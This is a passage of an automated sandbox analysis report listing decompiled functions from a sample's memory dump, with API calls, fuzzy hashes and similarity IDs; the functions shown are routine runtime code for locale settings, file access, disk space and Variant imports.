                                                                                                            • Opcode Fuzzy Hash: 1d9956f587c360cdec92ad1d204fd959c553d3ef32f82797025e7e9413b54aef
                                                                                                            • Instruction Fuzzy Hash: 410139A48062C199D730AFE4AC5A3583A64AF31318F748F7FD5009A272E77C45459BE2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048B490, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 46%
                                                                                                            			E5048B490(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x5048b4f4);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E504844E8( &_v16, 7,  &_v11);
				_push(_v16);
				E50487494(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E5048B4FB);
				return E50484278( &_v16);
			}








                                                                                                            0x5048b490
                                                                                                            0x5048b499
                                                                                                            0x5048b49e
                                                                                                            0x5048b49f
                                                                                                            0x5048b4a4
                                                                                                            0x5048b4a7
                                                                                                            0x5048b4b6
                                                                                                            0x5048b4c6
                                                                                                            0x5048b4ce
                                                                                                            0x5048b4d7
                                                                                                            0x5048b4e0
                                                                                                            0x5048b4e3
                                                                                                            0x5048b4e6
                                                                                                            0x5048b4f3

                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,5048B4F4), ref: 5048B4B6
                                                                                                            • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,5048B4F4), ref: 5048B4CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: b7e0924fb89c1c47d0be0a07e5201939d71988ae848033cd049123e3057bc49e
                                                                                                            • Instruction ID: ea37097c1202c62890b2445b97e1132d0406c365beb35e93f9a4542dbaedfd44
                                                                                                            • Opcode Fuzzy Hash: b7e0924fb89c1c47d0be0a07e5201939d71988ae848033cd049123e3057bc49e
                                                                                                            • Instruction Fuzzy Hash: 97F09631D042086FDB01DAE1C85299EB76ADFC5718F40CE69B510A7681EB3C65058790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048789A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E5048789A(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _v32;
				CHAR* _t28;
				int _t35;
				intOrPtr _t40;
				intOrPtr _t43;
				intOrPtr* _t48;
				intOrPtr* _t49;
				intOrPtr _t53;
				intOrPtr _t55;

				_t28 = _a4;
				if(_t28 == 0) {
					_v32 = 0;
				} else {
					_v32 = _t28;
				}
				_t35 = GetDiskFreeSpaceA(_v32,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t53 = _v24;
				_t40 = E50484E8C(_v28, _t53, _v16, 0);
				_t48 = _a8;
				 *_t48 = _t40;
				 *((intOrPtr*)(_t48 + 4)) = _t53;
				_t55 = _v24;
				_t43 = E50484E8C(_v28, _t55, _v20, 0);
				_t49 = _a12;
				 *_t49 = _t43;
				 *((intOrPtr*)(_t49 + 4)) = _t55;
				return _t35;
			}


















                                                                                                            0x504878a3
                                                                                                            0x504878a8
                                                                                                            0x504878b1
                                                                                                            0x504878aa
                                                                                                            0x504878aa
                                                                                                            0x504878aa
                                                                                                            0x504878c8
                                                                                                            0x504878d7
                                                                                                            0x504878da
                                                                                                            0x504878e7
                                                                                                            0x504878ea
                                                                                                            0x504878ef
                                                                                                            0x504878f2
                                                                                                            0x504878f4
                                                                                                            0x50487901
                                                                                                            0x50487904
                                                                                                            0x50487909
                                                                                                            0x5048790c
                                                                                                            0x5048790e
                                                                                                            0x50487917

                                                                                                            APIs
                                                                                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 504878C8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: DiskFreeSpace
                                                                                                            • String ID:
                                                                                                            • API String ID: 1705453755-0
                                                                                                            • Opcode ID: ebe6f916228bc7e7cf844132e1c625c74f8cad9cc0769fca23f9b2c8fc4d0b96
                                                                                                            • Instruction ID: e1b48f41af2ee07eb119f22e52b3fc8c0f40580c1faf019c3489973c370e0250
                                                                                                            • Opcode Fuzzy Hash: ebe6f916228bc7e7cf844132e1c625c74f8cad9cc0769fca23f9b2c8fc4d0b96
                                                                                                            • Instruction Fuzzy Hash: 5111E8B1E01109AFDB00CFD9C9819AFF7F9FF89214B10856AA919E7250E6319E01CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50485CC4, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 51%
                                                                                                            			E50485CC4(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x50485d2a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E504844E8( &_v20, 7,  &_v15);
				E5048317C(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E50485D31);
				return E50484278( &_v20);
			}








                                                                                                            0x50485ccd
                                                                                                            0x50485cd2
                                                                                                            0x50485cd3
                                                                                                            0x50485cd8
                                                                                                            0x50485cdb
                                                                                                            0x50485cea
                                                                                                            0x50485cfa
                                                                                                            0x50485d05
                                                                                                            0x50485d10
                                                                                                            0x50485d10
                                                                                                            0x50485d16
                                                                                                            0x50485d19
                                                                                                            0x50485d1c
                                                                                                            0x50485d29

                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,50485D2A), ref: 50485CEA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: e5d15ca03ab8073b93c0d676b71510ad7211461accfbe7be1083e4d56fc385e9
                                                                                                            • Instruction ID: 3bc12b5a17f77ebaafc3cebf47b0e390661221aefc8bfa2a646d50ead857fda5
                                                                                                            • Opcode Fuzzy Hash: e5d15ca03ab8073b93c0d676b71510ad7211461accfbe7be1083e4d56fc385e9
                                                                                                            • Instruction Fuzzy Hash: A2F06830904249AFEB15DED1CC55ADEF3BAFFC5714F408E79A51097590E7782604C694
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50489FC8, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E50489FC8(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E504842CC(_t10, _t18);
				}
				return E50484368(_t10, _t5 - 1,  &_v260);
			}






                                                                                                            0x50489fd3
                                                                                                            0x50489fd5
                                                                                                            0x50489fed
                                                                                                            0x00000000
                                                                                                            0x5048a005
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 50489FE6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: 87feedc70db68c6e3673c37872c4b0491b029a43494c53ef13237d5e15242471
                                                                                                            • Instruction ID: 5adecee41557ff9137c9a7c6b8785fdbe81f9d68b760c1c4c7ff30381f75dff9
                                                                                                            • Opcode Fuzzy Hash: 87feedc70db68c6e3673c37872c4b0491b029a43494c53ef13237d5e15242471
                                                                                                            • Instruction Fuzzy Hash: F8E0D83270531417D704A9984C869E6725C9FAC314F00476FFD04C7341EDE59D9583E5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048A014, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E5048A014(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






                                                                                                            0x5048a017
                                                                                                            0x5048a018
                                                                                                            0x5048a02e
                                                                                                            0x5048a035
                                                                                                            0x5048a030
                                                                                                            0x5048a030
                                                                                                            0x5048a030
                                                                                                            0x5048a03b

                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,5048B7A6,00000000,5048B9BF,?,?,00000000,00000000), ref: 5048A027
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: 0148a80135199b350dfe89c069973df05923792b1918f9d851e3761862a74f0a
                                                                                                            • Instruction ID: 689ce75e1f879e4a08db0b57857782ee8020e93526848af7a16d643265f2912d
                                                                                                            • Opcode Fuzzy Hash: 0148a80135199b350dfe89c069973df05923792b1918f9d851e3761862a74f0a
                                                                                                            • Instruction Fuzzy Hash: E4D05E6730E2502EB314995A2D85DBB4AACCEC66A5F104A3EB588C6202D2548C0793B1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50488A9C, Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E50488A9C() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear;
			}




                                                                                                            0x50488aa0
                                                                                                            0x50488aac

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 481472006-0
                                                                                                            • Opcode ID: aa8b449649a8cfb2eb78e191e0201f280db6f83403905236cb6b622386ad7bbe
                                                                                                            • Instruction ID: 0f149597e314b99b9e2d8f3fd8357cb7b61620643788a8aa2e6784e66e752b5d
                                                                                                            • Opcode Fuzzy Hash: aa8b449649a8cfb2eb78e191e0201f280db6f83403905236cb6b622386ad7bbe
                                                                                                            • Instruction Fuzzy Hash: F7A0110880A802028A8033280C032AA3000AC20A20FC80B88A8B8003EAEA2E022082EB
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048CA60, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E5048CA60() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x504957a0 = E5048CA28("VariantChangeTypeEx", E5048C5C4, _t91);
				 *0x504957a4 = E5048CA28("VarNeg", E5048C5F4, _t91);
				 *0x504957a8 = E5048CA28("VarNot", E5048C5F4, _t91);
				 *0x504957ac = E5048CA28("VarAdd", E5048C600, _t91);
				 *0x504957b0 = E5048CA28("VarSub", E5048C600, _t91);
				 *0x504957b4 = E5048CA28("VarMul", E5048C600, _t91);
				 *0x504957b8 = E5048CA28("VarDiv", E5048C600, _t91);
				 *0x504957bc = E5048CA28("VarIdiv", E5048C600, _t91);
				 *0x504957c0 = E5048CA28("VarMod", E5048C600, _t91);
				 *0x504957c4 = E5048CA28("VarAnd", E5048C600, _t91);
				 *0x504957c8 = E5048CA28("VarOr", E5048C600, _t91);
				 *0x504957cc = E5048CA28("VarXor", E5048C600, _t91);
				 *0x504957d0 = E5048CA28("VarCmp", E5048C60C, _t91);
				 *0x504957d4 = E5048CA28("VarI4FromStr", E5048C618, _t91);
				 *0x504957d8 = E5048CA28("VarR4FromStr", E5048C684, _t91);
				 *0x504957dc = E5048CA28("VarR8FromStr", E5048C6F0, _t91);
				 *0x504957e0 = E5048CA28("VarDateFromStr", E5048C75C, _t91);
				 *0x504957e4 = E5048CA28("VarCyFromStr", E5048C7C8, _t91);
				 *0x504957e8 = E5048CA28("VarBoolFromStr", E5048C834, _t91);
				 *0x504957ec = E5048CA28("VarBstrFromCy", E5048C8B4, _t91);
				 *0x504957f0 = E5048CA28("VarBstrFromDate", E5048C924, _t91);
				_t46 = E5048CA28("VarBstrFromBool", E5048C994, _t91);
				 *0x504957f4 = _t46;
				return _t46;
			}






                                                                                                            0x5048ca6e
                                                                                                            0x5048ca82
                                                                                                            0x5048ca98
                                                                                                            0x5048caae
                                                                                                            0x5048cac4
                                                                                                            0x5048cada
                                                                                                            0x5048caf0
                                                                                                            0x5048cb06
                                                                                                            0x5048cb1c
                                                                                                            0x5048cb32
                                                                                                            0x5048cb48
                                                                                                            0x5048cb5e
                                                                                                            0x5048cb74
                                                                                                            0x5048cb8a
                                                                                                            0x5048cba0
                                                                                                            0x5048cbb6
                                                                                                            0x5048cbcc
                                                                                                            0x5048cbe2
                                                                                                            0x5048cbf8
                                                                                                            0x5048cc0e
                                                                                                            0x5048cc24
                                                                                                            0x5048cc3a
                                                                                                            0x5048cc4a
                                                                                                            0x5048cc50
                                                                                                            0x5048cc57

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 5048CA69
                                                                                                              • Part of subcall function 5048CA28: GetProcAddress.KERNEL32(00000000), ref: 5048CA46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                            • Opcode ID: bd1378c238de0d5c54932269fcb6ec48e23fc286b6a7bc57e942931bab4316db
                                                                                                            • Instruction ID: a03aaf5e7e6c608f3c73f8f56b8e3e7a7b1f5cb9c32cdbf9b108fc40d9f2b184
                                                                                                            • Opcode Fuzzy Hash: bd1378c238de0d5c54932269fcb6ec48e23fc286b6a7bc57e942931bab4316db
                                                                                                            • Instruction Fuzzy Hash: C6414466A5525C9A5308EBED780142677DDDF60E007B0EF7FF408EB710EA38AC414BA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50482CB8, Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E50482CB8(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x50482c0c;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E50482C4C;
				}
				_t59[9] = E50482C98;
				_t59[8] = E50482C48;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E50482C48;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x504953e0) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E50482C4C;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                                                                            0x50482cb9
                                                                                                            0x50482cbd
                                                                                                            0x50482cc0
                                                                                                            0x50482ccc
                                                                                                            0x50482cd9
                                                                                                            0x50482cde
                                                                                                            0x50482ce3
                                                                                                            0x50482ce8
                                                                                                            0x50482cce
                                                                                                            0x50482ccf
                                                                                                            0x50482cf1
                                                                                                            0x50482cf6
                                                                                                            0x50482cfb
                                                                                                            0x50482cd1
                                                                                                            0x50482cd2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x50482d02
                                                                                                            0x50482d07
                                                                                                            0x50482d0c
                                                                                                            0x50482d0c
                                                                                                            0x50482d11
                                                                                                            0x50482d11
                                                                                                            0x50482d18
                                                                                                            0x50482d1f
                                                                                                            0x50482d2a
                                                                                                            0x50482de8
                                                                                                            0x50482def
                                                                                                            0x50482df6
                                                                                                            0x50482dff
                                                                                                            0x50482e0b
                                                                                                            0x50482e11
                                                                                                            0x50482e0d
                                                                                                            0x50482e0d
                                                                                                            0x50482e0d
                                                                                                            0x50482e01
                                                                                                            0x50482e01
                                                                                                            0x50482e01
                                                                                                            0x50482e13
                                                                                                            0x50482e1b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x50482e1d
                                                                                                            0x00000000
                                                                                                            0x50482d30
                                                                                                            0x50482d40
                                                                                                            0x50482d48
                                                                                                            0x50482e56
                                                                                                            0x50482e56
                                                                                                            0x00000000
                                                                                                            0x50482e5c
                                                                                                            0x50482d4e
                                                                                                            0x50482d56
                                                                                                            0x50482e1f
                                                                                                            0x50482e25
                                                                                                            0x50482e3e
                                                                                                            0x00000000
                                                                                                            0x50482e3e
                                                                                                            0x50482e29
                                                                                                            0x50482e30
                                                                                                            0x50482e44
                                                                                                            0x50482e49
                                                                                                            0x00000000
                                                                                                            0x50482e4f
                                                                                                            0x50482e35
                                                                                                            0x50482e37
                                                                                                            0x50482e37
                                                                                                            0x00000000
                                                                                                            0x50482e35
                                                                                                            0x50482d5c
                                                                                                            0x50482d69
                                                                                                            0x50482d6a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x50482d70
                                                                                                            0x50482d75
                                                                                                            0x50482d77
                                                                                                            0x50482d77
                                                                                                            0x50482d86
                                                                                                            0x00000000
                                                                                                            0x50482d8c
                                                                                                            0x50482da1
                                                                                                            0x50482da6
                                                                                                            0x50482da8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x50482dae
                                                                                                            0x50482db0
                                                                                                            0x50482dbc
                                                                                                            0x50482dd0
                                                                                                            0x00000000
                                                                                                            0x50482de0
                                                                                                            0x00000000
                                                                                                            0x50482de0
                                                                                                            0x50482dd0
                                                                                                            0x50482dbe
                                                                                                            0x50482dbe
                                                                                                            0x00000000
                                                                                                            0x50482db0
                                                                                                            0x50482d86

                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 50482D40
                                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 50482D64
                                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 50482D80
                                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 50482DA1
                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 50482DCA
                                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 50482DD8
                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 50482E13
                                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 50482E29
                                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 50482E44
                                                                                                            • GetLastError.KERNEL32(000000F5), ref: 50482E5C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                            • String ID:
                                                                                                            • API String ID: 1694776339-0
                                                                                                            • Opcode ID: 596a64f303aeead98c8b3061024b536661bac258387ef49958ee07de25217031
                                                                                                            • Instruction ID: 2c98d919e1e734a4f76839dc253da3e2775559ac93326d355d5c2b5aa39a8c86
                                                                                                            • Opcode Fuzzy Hash: 596a64f303aeead98c8b3061024b536661bac258387ef49958ee07de25217031
                                                                                                            • Instruction Fuzzy Hash: 804171301007019BE7249F24CB057B7B6E5EF04B54F208F2EE6A6966E4E7BD98428789
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048B6F4, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E5048B6F4(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x5048b9bf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E5048B57C();
				E5048A078(__ebx, __edi, __esi);
				_t196 =  *0x50495748;
				if( *0x50495748 != 0) {
					E5048A250(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E50489FC8(_t43, 0, 0x14,  &_v20);
				E504842CC(0x5049567c, _v20);
				E50489FC8(_t43, 0x5048b9d4, 0x1b,  &_v24);
				 *0x50495680 = E50487494(0x5048b9d4, 0, _t196);
				E50489FC8(_t132, 0x5048b9d4, 0x1c,  &_v28);
				 *0x50495681 = E50487494(0x5048b9d4, 0, _t196);
				 *0x50495682 = E5048A014(_t132, 0x2c, 0xf);
				 *0x50495683 = E5048A014(_t132, 0x2e, 0xe);
				E50489FC8(_t132, 0x5048b9d4, 0x19,  &_v32);
				 *0x50495684 = E50487494(0x5048b9d4, 0, _t196);
				 *0x50495685 = E5048A014(_t132, 0x2f, 0x1d);
				E50489FC8(_t132, "m/d/yy", 0x1f,  &_v40);
				E5048A300(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E504842CC(0x50495688, _v36);
				E50489FC8(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E5048A300(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E504842CC(0x5049568c, _v44);
				 *0x50495690 = E5048A014(_t132, 0x3a, 0x1e);
				E50489FC8(_t132, 0x5048ba08, 0x28,  &_v52);
				E504842CC(0x50495694, _v52);
				E50489FC8(_t132, 0x5048ba14, 0x29,  &_v56);
				E504842CC(0x50495698, _v56);
				E50484278( &_v12);
				E50484278( &_v16);
				E50489FC8(_t132, 0x5048b9d4, 0x25,  &_v60);
				_t104 = E50487494(0x5048b9d4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E50484310( &_v8, 0x5048ba2c);
				} else {
					E50484310( &_v8, 0x5048ba20);
				}
				E50489FC8(_t132, 0x5048b9d4, 0x23,  &_v64);
				_t111 = E50487494(0x5048b9d4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E50489FC8(_t132, 0x5048b9d4, 0x1005,  &_v68);
					if(E50487494(0x5048b9d4, 0, _t198) != 0) {
						E50484310( &_v12, 0x5048ba48);
					} else {
						E50484310( &_v16, 0x5048ba38);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E504845D4();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E504845D4();
				 *0x5049574a = E5048A014(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E5048B9C6);
				return E5048429C( &_v68, 0x10);
			}

























                                                                                                            0x5048b6f4
                                                                                                            0x5048b6f4
                                                                                                            0x5048b6f5
                                                                                                            0x5048b6f7
                                                                                                            0x5048b6fc
                                                                                                            0x5048b6fc
                                                                                                            0x5048b6fe
                                                                                                            0x5048b700
                                                                                                            0x5048b700
                                                                                                            0x5048b703
                                                                                                            0x5048b706
                                                                                                            0x5048b707
                                                                                                            0x5048b70c
                                                                                                            0x5048b70f
                                                                                                            0x5048b712
                                                                                                            0x5048b717
                                                                                                            0x5048b71c
                                                                                                            0x5048b723
                                                                                                            0x5048b725
                                                                                                            0x5048b725
                                                                                                            0x5048b72f
                                                                                                            0x5048b73e
                                                                                                            0x5048b74b
                                                                                                            0x5048b760
                                                                                                            0x5048b76f
                                                                                                            0x5048b784
                                                                                                            0x5048b793
                                                                                                            0x5048b7a6
                                                                                                            0x5048b7b9
                                                                                                            0x5048b7ce
                                                                                                            0x5048b7dd
                                                                                                            0x5048b7f0
                                                                                                            0x5048b805
                                                                                                            0x5048b810
                                                                                                            0x5048b81d
                                                                                                            0x5048b832
                                                                                                            0x5048b83d
                                                                                                            0x5048b84a
                                                                                                            0x5048b85d
                                                                                                            0x5048b872
                                                                                                            0x5048b87f
                                                                                                            0x5048b894
                                                                                                            0x5048b8a1
                                                                                                            0x5048b8a9
                                                                                                            0x5048b8b1
                                                                                                            0x5048b8c6
                                                                                                            0x5048b8d0
                                                                                                            0x5048b8d5
                                                                                                            0x5048b8d7
                                                                                                            0x5048b8f0
                                                                                                            0x5048b8d9
                                                                                                            0x5048b8e1
                                                                                                            0x5048b8e1
                                                                                                            0x5048b905
                                                                                                            0x5048b90f
                                                                                                            0x5048b914
                                                                                                            0x5048b916
                                                                                                            0x5048b928
                                                                                                            0x5048b939
                                                                                                            0x5048b952
                                                                                                            0x5048b93b
                                                                                                            0x5048b943
                                                                                                            0x5048b943
                                                                                                            0x5048b939
                                                                                                            0x5048b957
                                                                                                            0x5048b95a
                                                                                                            0x5048b95d
                                                                                                            0x5048b962
                                                                                                            0x5048b96f
                                                                                                            0x5048b974
                                                                                                            0x5048b977
                                                                                                            0x5048b97a
                                                                                                            0x5048b97f
                                                                                                            0x5048b98c
                                                                                                            0x5048b99f
                                                                                                            0x5048b9a6
                                                                                                            0x5048b9a9
                                                                                                            0x5048b9ac
                                                                                                            0x5048b9be

